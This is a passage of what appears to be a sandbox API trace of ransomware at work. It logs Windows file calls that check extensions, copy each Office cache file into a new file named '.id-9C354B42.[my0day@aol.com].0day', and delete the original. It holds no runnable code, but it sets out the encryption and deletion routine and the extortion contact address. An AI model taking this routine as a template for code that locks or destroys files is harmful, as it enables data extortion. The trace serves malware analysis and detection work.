lpString2=".msi") returned 1 [0044.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.287] lstrlenW (lpString=".zip") returned 4 [0044.287] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.287] lstrlenW (lpString=".rar") returned 4 [0044.287] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.287] lstrlenW (lpString=".bz2") returned 4 [0044.287] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.287] lstrlenW (lpString=".7z") returned 3 [0044.287] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.287] lstrlenW (lpString=".dbf") returned 4 [0044.288] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.288] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.288] lstrlenW (lpString=".1cd") returned 4 [0044.288] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.288] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.288] lstrlenW (lpString=".jpg") returned 4 [0044.288] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.288] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0044.288] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0044.288] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0044.288] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=868864) returned 1 [0044.288] CloseHandle (hObject=0x16c) returned 1 [0044.288] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 0x2020 [0044.288] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.288] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0044.289] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.289] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.289] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.289] GetLastError () returned 0x0 [0044.289] ReadFile (in: hFile=0x16c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0044.307] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0044.324] ReadFile (in: hFile=0x16c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.324] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0044.324] SetEndOfFile (hFile=0x1d8) returned 1 [0044.324] CloseHandle (hObject=0x1d8) returned 1 [0044.324] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.325] SetEndOfFile (hFile=0x16c) returned 1 [0044.331] CloseHandle (hObject=0x16c) returned 1 [0044.331] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.332] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 1 [0044.332] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.332] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.332] lstrlenW (lpString=".doc") returned 4 [0044.332] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.332] lstrlenW (lpString=".docx") returned 5 [0044.332] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0044.332] lstrlenW (lpString=".pdf") returned 4 [0044.332] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.332] lstrlenW (lpString=".xls") returned 4 [0044.332] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.332] lstrlenW (lpString=".xlsx") returned 5 [0044.332] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0044.332] lstrlenW (lpString=".ppt") returned 4 [0044.332] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.332] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.332] lstrlenW (lpString=".zip") returned 4 [0044.332] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.332] lstrlenW (lpString=".rar") returned 4 [0044.332] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.332] lstrlenW (lpString=".bz2") returned 4 [0044.332] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.332] lstrlenW (lpString=".7z") returned 3 [0044.332] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.332] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.332] lstrlenW (lpString=".dbf") returned 4 [0044.333] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.333] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.333] lstrlenW (lpString=".1cd") returned 4 [0044.333] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.333] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.333] lstrlenW (lpString=".jpg") returned 4 [0044.333] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.333] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.333] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.333] lstrlenW (lpString=".doc") returned 4 [0044.333] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.333] lstrlenW (lpString=".docx") returned 5 [0044.333] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0044.333] lstrlenW (lpString=".pdf") returned 4 [0044.333] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.333] lstrlenW (lpString=".xls") returned 4 [0044.333] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.333] lstrlenW (lpString=".xlsx") returned 5 [0044.333] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0044.333] lstrlenW (lpString=".ppt") returned 4 [0044.333] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.333] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.333] lstrlenW (lpString=".zip") returned 4 [0044.333] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.333] lstrlenW (lpString=".rar") returned 4 [0044.333] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.550] lstrlenW (lpString=".bz2") returned 4 [0044.550] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.550] lstrlenW (lpString=".7z") returned 3 [0044.550] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.550] lstrlenW (lpString=".dbf") returned 4 [0044.550] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.550] lstrlenW (lpString=".1cd") returned 4 [0044.550] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0044.550] lstrlenW (lpString=".jpg") returned 4 [0044.550] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.550] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0044.550] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0044.550] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0044.551] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=36233052) returned 1 [0044.551] CloseHandle (hObject=0x170) returned 1 [0044.551] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0044.551] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.551] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0044.551] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0044.551] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.551] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.551] ReadFile (in: hFile=0x170, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.556] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.556] ReadFile (in: hFile=0x170, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.562] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.562] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.562] ReadFile (in: hFile=0x170, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.578] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.578] WriteFile (in: hFile=0x170, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0044.599] SetEndOfFile (hFile=0x170) returned 1 [0044.599] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0044.735] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.735] WriteFile (in: hFile=0x170, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.736] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.736] WriteFile (in: hFile=0x170, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.737] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.737] WriteFile (in: hFile=0x170, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.739] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0044.739] CloseHandle (hObject=0x170) returned 1 [0044.739] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.739] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.739] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.739] lstrlenW (lpString=".doc") returned 4 [0044.739] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.739] lstrlenW (lpString=".docx") returned 5 [0044.739] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0044.739] lstrlenW (lpString=".pdf") returned 4 [0044.739] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.739] lstrlenW (lpString=".xls") returned 4 [0044.740] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.740] lstrlenW (lpString=".xlsx") returned 5 [0044.740] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0044.740] lstrlenW (lpString=".ppt") returned 4 [0044.740] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.740] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.740] lstrlenW (lpString=".zip") returned 4 [0044.740] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.740] lstrlenW (lpString=".rar") returned 4 [0044.740] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.740] lstrlenW (lpString=".bz2") returned 4 [0044.740] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.740] lstrlenW (lpString=".7z") returned 3 [0044.740] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.740] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.740] lstrlenW (lpString=".dbf") returned 4 [0044.740] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.740] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.740] lstrlenW (lpString=".1cd") returned 4 [0044.740] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.740] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.740] lstrlenW (lpString=".jpg") returned 4 [0044.740] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.740] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.740] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.740] lstrlenW (lpString=".doc") returned 4 [0044.740] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.740] lstrlenW (lpString=".docx") returned 5 [0044.740] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0044.740] lstrlenW (lpString=".pdf") returned 4 [0044.740] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.740] lstrlenW (lpString=".xls") returned 4 [0044.740] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.741] lstrlenW (lpString=".xlsx") returned 5 [0044.741] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0044.741] lstrlenW (lpString=".ppt") returned 4 [0044.741] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.741] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.741] lstrlenW (lpString=".zip") returned 4 [0044.741] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.741] lstrlenW (lpString=".rar") returned 4 [0044.741] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.741] lstrlenW (lpString=".bz2") returned 4 [0044.741] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.741] lstrlenW (lpString=".7z") returned 3 [0044.741] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.741] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.741] lstrlenW (lpString=".dbf") returned 4 [0044.741] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.741] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.741] lstrlenW (lpString=".1cd") returned 4 [0044.741] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.741] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0044.741] lstrlenW (lpString=".jpg") returned 4 [0044.741] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.741] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0044.741] lstrlenW (lpString="PidGenX.dll") returned 11 [0044.741] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0044.742] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=1463568) returned 1 [0044.742] CloseHandle (hObject=0x170) returned 1 [0044.742] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0044.742] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.742] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0044.742] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.742] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.742] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.742] GetLastError () returned 0x0 [0044.742] ReadFile (in: hFile=0x170, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0044.786] WriteFile (in: hFile=0x188, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0044.884] ReadFile (in: hFile=0x170, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x65520, lpOverlapped=0x0) returned 1 [0044.930] WriteFile (in: hFile=0x188, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0044.941] ReadFile (in: hFile=0x170, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.941] WriteFile (in: hFile=0x188, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.941] SetEndOfFile (hFile=0x188) returned 1 [0044.941] CloseHandle (hObject=0x188) returned 1 [0044.941] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.941] SetEndOfFile (hFile=0x170) returned 1 [0044.945] CloseHandle (hObject=0x170) returned 1 [0044.945] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.945] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0044.959] lstrlenW (lpString=".doc") returned 4 [0044.959] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0044.959] lstrlenW (lpString=".docx") returned 5 [0044.959] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0044.959] lstrlenW (lpString=".pdf") returned 4 [0044.959] lstrcmpiW (lpString1=".pdf", 